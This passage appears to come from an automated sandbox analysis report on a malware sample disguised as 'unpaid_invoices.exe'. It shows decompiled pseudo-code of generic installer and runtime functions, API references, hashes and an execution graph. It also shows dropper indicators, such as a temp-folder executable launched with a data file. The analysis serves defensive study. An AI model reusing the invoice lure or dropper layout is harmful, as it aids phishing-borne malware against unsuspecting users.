					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404616(0x413);
				return 0;
			}





              0x00405648
              0x00405652
              0x0040566e
              0x00405690
              0x00405693
              0x00405699
              0x004056a3
              0x004056a4
              0x004056a6
              0x004056ac
              0x004056ac
              0x004056b6
              0x00000000
              0x004056c4
              0x0040567b
              0x004056b3
              0x004056b3
              0x00000000
              0x004056b3
              0x00405687
              0x00405689
              0x00000000
              0x00405689
              0x00405658
              0x00000000
              0x00000000
              0x0040565f
              0x00000000

              APIs
              • IsWindowVisible.USER32(?), ref: 00405673
              • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
                • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
              • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
              • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
              • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040653C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







              0x0040654a
              0x0040654c
              0x00406564
              0x00406569
              0x0040656e
              0x004065ac
              0x004065ac
              0x00406570
              0x00406582
              0x0040658d
              0x00406593
              0x0040659e
              0x00000000
              0x00000000
              0x0040659e
              0x004065b2

              APIs
              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F68,00000000,?,?,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,?,?,004067A3,80000002), ref: 00406582
              • RegCloseKey.ADVAPI32(?,?,004067A3,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,007A0F68), ref: 0040658D
              Strings
              • C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq, xrefs: 00406543
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CloseQueryValue
              • String ID: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
              • API String ID: 3356406503-1929354863
              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405F89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00405F89(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





              0x00405f8a
              0x00405f94
              0x00405f97
              0x00405f9d
              0x00405f9e
              0x00405f9f
              0x00405fa7
              0x00000000
              0x00000000
              0x00000000
              0x00405fa7
              0x00405fa9
              0x00405fb1

              APIs
              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\unpaid_invoices.exe,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00405F8F
              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\unpaid_invoices.exe,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00405F9F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CharPrevlstrlen
              • String ID: C:\Users\user\Desktop
              • API String ID: 2709904686-224404859
              • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
              • Instruction ID: 7456b8531bb3b8a4d8e8c00392aaf18f99b4ab5ae19bc30171d9ddc8328a16ac
              • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
              • Instruction Fuzzy Hash: B1D05EB2411D219ED3126704DD0099F77A8EF5230174A4426E841E71A0D77C5C918AAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004060C3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









              0x004060d3
              0x004060d5
              0x004060d8
              0x00406104
              0x004060dd
              0x004060e6
              0x004060eb
              0x004060f6
              0x004060f9
              0x00406115
              0x004060fb
              0x00406102
              0x00000000
              0x00406102
              0x0040610e
              0x00406112
              0x00406112
              0x0040610c
              0x00000000

              APIs
              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
              • CharNextA.USER32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FC
              • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:7.9%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:9.4%
              Total number of Nodes:1642
              Total number of Limit Nodes:100
              execution_graph 7884 e14701 7885 e14879 __calloc_crt 58 API calls 7884->7885 7886 e1470b EncodePointer 7885->7886 7887 e14724 7886->7887 7304 e193e0 7305 e193f6 7304->7305 7306 e193ea 7304->7306 7306->7305 7307 e193ef CloseHandle 7306->7307 7307->7305 7595 e126a0 7596 e126b2 7595->7596 7598 e126c0 @_EH4_CallFilterFunc@8 7595->7598 7597 e15780 __cftoe_l 6 API calls 7596->7597 7597->7598 7888 e16480 RtlUnwind 7308 e116e3 7311 e1345b 7308->7311 7312 e13703 __getptd_noexit 58 API calls 7311->7312 7313 e116f4 7312->7313 7457 e11747 7460 e13ed8 7457->7460 7459 e1174c 7459->7459 7461 e13f08 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7460->7461 7462 e13efb 7460->7462 7463 e13eff 7461->7463 7462->7461 7462->7463 7463->7459 7464 e11f47 7471 e158de 7464->7471 7467 e11f5a 7469 e14841 _free 58 API calls 7467->7469 7470 e11f65 7469->7470 7484 e158e7 7471->7484 7473 e11f4c 7473->7467 7474 e15797 7473->7474 7475 e157a3 __commit 7474->7475 7476 e1443f __lock 58 API calls 7475->7476 7479 e157af 7476->7479 7477 e15814 7514 e1582b 7477->7514 7479->7477 7481 e157e8 DeleteCriticalSection 7479->7481 7501 e17c49 7479->7501 7480 e15820 __commit 7480->7467 7483 e14841 _free 58 API calls 7481->7483 7483->7479 7485 e158f3 __commit 7484->7485 7486 e1443f __lock 58 API calls 7485->7486 7492 e15902 7486->7492 7487 e159a0 7497 e159c2 7487->7497 7489 e11fad __getstream 59 API calls 7489->7492 7490 e159ac __commit 7490->7473 7492->7487 7492->7489 7493 e15834 82 API calls __fflush_nolock 7492->7493 7494 e1598f 7492->7494 7493->7492 7495 e12017 __getstream 2 API calls 7494->7495 7496 e1599d 7495->7496 7496->7492 7500 e145a9 LeaveCriticalSection 7497->7500 7499 e159c9 7499->7490 7500->7499 7502 e17c55 __commit 7501->7502 7503 e17c81 7502->7503 7504 e17c69 7502->7504 7506 e11f6e __lock_file 59 API calls 7503->7506 7508 e17c79 __commit 7503->7508 7505 e11cd3 __cftoe_l 58 API calls 7504->7505 7507 e17c6e 7505->7507 7509 e17c93 7506->7509 7510 e11e99 __cftoe_l 9 API calls 7507->7510 7508->7479 7517 e17bdd 7509->7517 7510->7508 7576 e145a9 LeaveCriticalSection 7514->7576 7516 e15832 7516->7480 7518 e17c00 7517->7518 7519 e17bec 7517->7519 7525 e17bfc 7518->7525 7536 e1587a 7518->7536 7520 e11cd3 __cftoe_l 58 API calls 7519->7520 7521 e17bf1 7520->7521 7523 e11e99 __cftoe_l 9 API calls 7521->7523 7523->7525 7533 e17cb8 7525->7533 7528 e12883 __flush 58 API calls 7529 e17c1a 7528->7529 7546 e188b4 7529->7546 7531 e17c20 7531->7525 7532 e14841 _free 58 API calls 7531->7532 7532->7525 7534 e11fdd __wfsopen 2 API calls 7533->7534 7535 e17cbe 7534->7535 7535->7508 7537 e1588d 7536->7537 7541 e158b1 7536->7541 7538 e12883 __flush 58 API calls 7537->7538 7537->7541 7539 e158aa 7538->7539 7540 e17da9 __write 78 API calls 7539->7540 7540->7541 7542 e1915b 7541->7542 7543 e19168 7542->7543 7545 e17c14 7542->7545 7544 e14841 _free 58 API calls 7543->7544 7543->7545 7544->7545 7545->7528 7547 e188c0 __commit 7546->7547 7548 e188e4 7547->7548 7549 e188cd 7547->7549 7551 e1896f 7548->7551 7553 e188f4 7548->7553 7550 e11c9f __commit 58 API calls 7549->7550 7552 e188d2 7550->7552 7554 e11c9f __commit 58 API calls 7551->7554 7555 e11cd3 __cftoe_l 58 API calls 7552->7555 7556 e18912 7553->7556 7557 e1891c 7553->7557 7558 e18917 7554->7558 7566 e188d9 __commit 7555->7566 7559 e11c9f __commit 58 API calls 7556->7559 7560 e16c98 ___lock_fhandle 59 API calls 7557->7560 7561 e11cd3 __cftoe_l 58 API calls 7558->7561 7559->7558 7562 e18922 7560->7562 7563 e1897b 7561->7563 7564 e18940 7562->7564 7565 e18935 7562->7565 7568 e11e99 __cftoe_l 9 API calls 7563->7568 7567 e11cd3 __cftoe_l 58 API calls 7564->7567 7569 e1898f __close_nolock 61 API calls 7565->7569 7566->7531 7570 e1893b 7567->7570 7568->7566 7569->7570 7572 e18967 7570->7572 7575 e1703e LeaveCriticalSection 7572->7575 7574 e1896d 7574->7566 7575->7574 7576->7516 7889 e17587 7890 e117ce __lock 58 API calls 7889->7890 7891 e1758e 7890->7891 7892 e1340c 7893 e13441 7892->7893 7894 e1341c 7892->7894 7894->7893 7899 e14971 7894->7899 7900 e1497d __commit 7899->7900 7901 e136eb __setmbcp 58 API calls 7900->7901 7902 e14982 7901->7902 7905 e17590 7902->7905 7916 e149c3 DecodePointer 7905->7916 7907 e175a0 7909 e175c8 7907->7909 7910 e175aa IsProcessorFeaturePresent 7907->7910 7908 e17595 7908->7907 7917 e149ec 7908->7917 7913 e1188c _raise 58 API calls 7909->7913 7912 e175b5 7910->7912 7914 e11d3c __call_reportfault 7 API calls 7912->7914 7915 e175d2 7913->7915 7914->7909 7916->7908 7920 e149f8 __commit 7917->7920 7918 e14a62 7919 e14a3f DecodePointer 7918->7919 7925 e14a71 7918->7925 7924 e14a2e _siglookup 7919->7924 7920->7918 7920->7919 7921 e14a29 7920->7921 7926 e14a25 7920->7926 7922 e13703 __getptd_noexit 58 API calls 7921->7922 7922->7924 7928 e14acf 7924->7928 7930 e1188c _raise 58 API calls 7924->7930 7937 e14a37 __commit 7924->7937 7927 e11cd3 __cftoe_l 58 API calls 7925->7927 7926->7921 7926->7925 7929 e14a76 7927->7929 7932 e1443f __lock 58 API calls 7928->7932 7934 e14ada 7928->7934 7931 e11e99 __cftoe_l 9 API calls 7929->7931 7930->7928 7931->7937 7932->7934 7933 e14b3c EncodePointer 7935 e14b0f 7933->7935 7934->7933 7934->7935 7938 e14b6d 7935->7938 7937->7907 7939 e14b71 7938->7939 7940 e14b78 7938->7940 7942 e145a9 LeaveCriticalSection 7939->7942 7940->7937 7942->7940 7314 e14bef 7317 e14fd3 7314->7317 7316 e14bfe 7318 e14fdf __commit 7317->7318 7319 e136eb __setmbcp 58 API calls 7318->7319 7320 e14fe7 7319->7320 7321 e14f2d __setmbcp 58 API calls 7320->7321 7322 e14ff1 7321->7322 7342 e14cce 7322->7342 7325 e148c1 __malloc_crt 58 API calls 7326 e15013 7325->7326 7327 e15140 __commit 7326->7327 7349 e1517b 7326->7349 7327->7316 7330 e15150 7330->7327 7333 e15163 7330->7333 7336 e14841 _free 58 API calls 7330->7336 7331 e15049 7332 e15069 7331->7332 7335 e14841 _free 58 API calls 7331->7335 7332->7327 7337 e1443f __lock 58 API calls 7332->7337 7334 e11cd3 __cftoe_l 58 API calls 7333->7334 7334->7327 7335->7332 7336->7333 7338 e15098 7337->7338 7339 e15126 7338->7339 7341 e14841 _free 58 API calls 7338->7341 7359 e15145 7339->7359 7341->7339 7343 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7342->7343 7344 e14cde 7343->7344 7345 e14ced GetOEMCP 7344->7345 7346 e14cff 7344->7346 7348 e14d16 7345->7348 7347 e14d04 GetACP 7346->7347 7346->7348 7347->7348 7348->7325 7348->7327 7350 e14cce getSystemCP 60 API calls 7349->7350 7351 e15198 7350->7351 7354 e151e9 IsValidCodePage 7351->7354 7356 e1519f setSBCS 7351->7356 7358 e1520e _memset __setmbcp_nolock 7351->7358 7352 e15780 __cftoe_l 6 API calls 7353 e1503a 7352->7353 7353->7330 7353->7331 7355 e151fb GetCPInfo 7354->7355 7354->7356 7355->7356 7355->7358 7356->7352 7362 e14d9b GetCPInfo 7358->7362 7428 e145a9 LeaveCriticalSection 7359->7428 7361 e1514c 7361->7327 7363 e14e7d 7362->7363 7367 e14dd3 7362->7367 7366 e15780 __cftoe_l 6 API calls 7363->7366 7369 e14f29 7366->7369 7372 e17a65 7367->7372 7369->7356 7371 e17927 ___crtLCMapStringA 62 API calls 7371->7363 7373 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7372->7373 7374 e17a76 7373->7374 7382 e1796d 7374->7382 7377 e17927 7378 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7377->7378 7379 e17938 7378->7379 7399 e17723 7379->7399 7383 e17994 MultiByteToWideChar 7382->7383 7384 e17987 7382->7384 7385 e179b9 7383->7385 7388 e179c0 7383->7388 7384->7383 7386 e15780 __cftoe_l 6 API calls 7385->7386 7387 e14e34 7386->7387 7387->7377 7390 e11151 _malloc 58 API calls 7388->7390 7393 e179e2 _memset __crtGetStringTypeA_stat 7388->7393 7389 e17a1e MultiByteToWideChar 7391 e17a48 7389->7391 7392 e17a38 GetStringTypeW 7389->7392 7390->7393 7395 e175d3 7391->7395 7392->7391 7393->7385 7393->7389 7396 e175dd 7395->7396 7397 e175ee 7395->7397 7396->7397 7398 e14841 _free 58 API calls 7396->7398 7397->7385 7398->7397 7402 e1773c MultiByteToWideChar 7399->7402 7401 e1779b 7403 e15780 __cftoe_l 6 API calls 7401->7403 7402->7401 7405 e177a2 7402->7405 7406 e14e55 7403->7406 7404 e17801 MultiByteToWideChar 7407 e17868 7404->7407 7408 e1781a 7404->7408 7411 e11151 _malloc 58 API calls 7405->7411 7413 e177ca __crtGetStringTypeA_stat 7405->7413 7406->7371 7410 e175d3 __crtGetStringTypeA_stat 58 API calls 7407->7410 7424 e17669 7408->7424 7410->7401 7411->7413 7412 e1782e 7412->7407 7414 e17844 7412->7414 7415 e17870 7412->7415 7413->7401 7413->7404 7414->7407 7416 e17669 __crtLCMapStringA_stat LCMapStringW 7414->7416 7419 e11151 _malloc 58 API calls 7415->7419 7422 e17898 __crtGetStringTypeA_stat 7415->7422 7416->7407 7417 e17669 __crtLCMapStringA_stat LCMapStringW 7418 e178db 7417->7418 7420 e17903 7418->7420 7423 e178f5 WideCharToMultiByte 7418->7423 7419->7422 7421 e175d3 __crtGetStringTypeA_stat 58 API calls 7420->7421 7421->7407 7422->7407 7422->7417 7423->7420 7425 e17694 __crtLCMapStringA_stat 7424->7425 7426 e17679 7424->7426 7427 e176ab LCMapStringW 7425->7427 7426->7412 7427->7412 7428->7361 7577 e18bd1 7578 e18bdd __commit 7577->7578 7579 e1443f __lock 58 API calls 7578->7579 7580 e18c14 __commit 7578->7580 7581 e18bf1 7579->7581 7582 e173e6 __updatetlocinfoEx_nolock 58 API calls 7581->7582 7583 e18c01 7582->7583 7585 e18c1a 7583->7585 7588 e145a9 LeaveCriticalSection 7585->7588 7587 e18c21 7587->7580 7588->7587 6059 e115d0 6060 e115dc __commit 6059->6060 6096 e1408f GetStartupInfoW 6060->6096 6062 e115e1 6098 e11d27 GetProcessHeap 6062->6098 6064 e11639 6065 e11644 6064->6065 6178 e11720 6064->6178 6099 e13825 6065->6099 6068 e1164a 6069 e11720 _fast_error_exit 58 API calls 6068->6069 6070 e11655 __RTC_Initialize 6068->6070 6069->6070 6120 e138b8 6070->6120 6072 e11664 6073 e11670 GetCommandLineW 6072->6073 6074 e11720 _fast_error_exit 58 API calls 6072->6074 6139 e13fb4 GetEnvironmentStringsW 6073->6139 6076 e1166f 6074->6076 6076->6073 6079 e1168a 6080 e11695 6079->6080 6186 e117ce 6079->6186 6149 e13da9 6080->6149 6083 e1169b 6084 e116a6 6083->6084 6085 e117ce __lock 58 API calls 6083->6085 6163 e11808 6084->6163 6085->6084 6087 e116ae 6088 e116b9 __wwincmdln 6087->6088 6089 e117ce __lock 58 API calls 6087->6089 6169 e11000 6088->6169 6089->6088 6092 e116dc 6196 e117f9 6092->6196 6095 e116e1 __commit 6097 e140a5 6096->6097 6097->6062 6098->6064 6199 e118a0 RtlEncodePointer 6099->6199 6101 e1382a 6205 e14570 6101->6205 6104 e13833 6209 e1389b 6104->6209 6109 e13850 6221 e14879 6109->6221 6112 e13892 6114 e1389b __mtterm 61 API calls 6112->6114 6116 e13897 6114->6116 6115 e13871 6115->6112 6117 e13877 6115->6117 6116->6068 6230 e13772 6117->6230 6119 e1387f GetCurrentThreadId 6119->6068 6121 e138c4 __commit 6120->6121 6122 e1443f __lock 58 API calls 6121->6122 6123 e138cb 6122->6123 6124 e14879 __calloc_crt 58 API calls 6123->6124 6126 e138dc 6124->6126 6125 e13947 GetStartupInfoW 6133 e1395c 6125->6133 6136 e13a8b 6125->6136 6126->6125 6127 e138e7 __commit @_EH4_CallFilterFunc@8 6126->6127 6127->6072 6128 e13b53 6494 e13b63 6128->6494 6130 e14879 __calloc_crt 58 API calls 6130->6133 6131 e13ad8 GetStdHandle 6131->6136 6132 e13aeb GetFileType 6132->6136 6133->6130 6134 e139aa 6133->6134 6133->6136 6135 e139de GetFileType 6134->6135 6134->6136 6137 e140b2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6134->6137 6135->6134 6136->6128 6136->6131 6136->6132 6138 e140b2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6136->6138 6137->6134 6138->6136 6140 e13fc5 6139->6140 6141 e11680 6139->6141 6142 e148c1 __malloc_crt 58 API calls 6140->6142 6145 e13b6c GetModuleFileNameW 6141->6145 6143 e13feb _memmove 6142->6143 6144 e14001 FreeEnvironmentStringsW 6143->6144 6144->6141 6146 e13ba0 _wparse_cmdline 6145->6146 6147 e148c1 __malloc_crt 58 API calls 6146->6147 6148 e13be0 _wparse_cmdline 6146->6148 6147->6148 6148->6079 6150 e13dc2 __NMSG_WRITE 6149->6150 6154 e13dba 6149->6154 6151 e14879 __calloc_crt 58 API calls 6150->6151 6159 e13deb __NMSG_WRITE 6151->6159 6152 e13e42 6153 e14841 _free 58 API calls 6152->6153 6153->6154 6154->6083 6155 e14879 __calloc_crt 58 API calls 6155->6159 6156 e13e67 6157 e14841 _free 58 API calls 6156->6157 6157->6154 6158 e15467 __NMSG_WRITE 58 API calls 6158->6159 6159->6152 6159->6154 6159->6155 6159->6156 6159->6158 6160 e13e7e 6159->6160 6161 e11ea9 __invoke_watson 8 API calls 6160->6161 6162 e13e8a 6161->6162 6162->6083 6164 e11814 __IsNonwritableInCurrentImage 6163->6164 6498 e14952 6164->6498 6166 e11832 __initterm_e 6168 e11851 __cinit __IsNonwritableInCurrentImage 6166->6168 6501 e1482c 6166->6501 6168->6087 6170 e11151 _malloc 58 API calls 6169->6170 6171 e11013 6170->6171 6567 e111e3 6171->6567 6175 e1104d _memset 6176 e1108e 6175->6176 6177 e11085 EnumSystemCodePagesW 6175->6177 6176->6092 6193 e11a71 6176->6193 6177->6176 6179 e11731 6178->6179 6180 e1172c 6178->6180 6182 e11ae2 __NMSG_WRITE 58 API calls 6179->6182 6181 e11a85 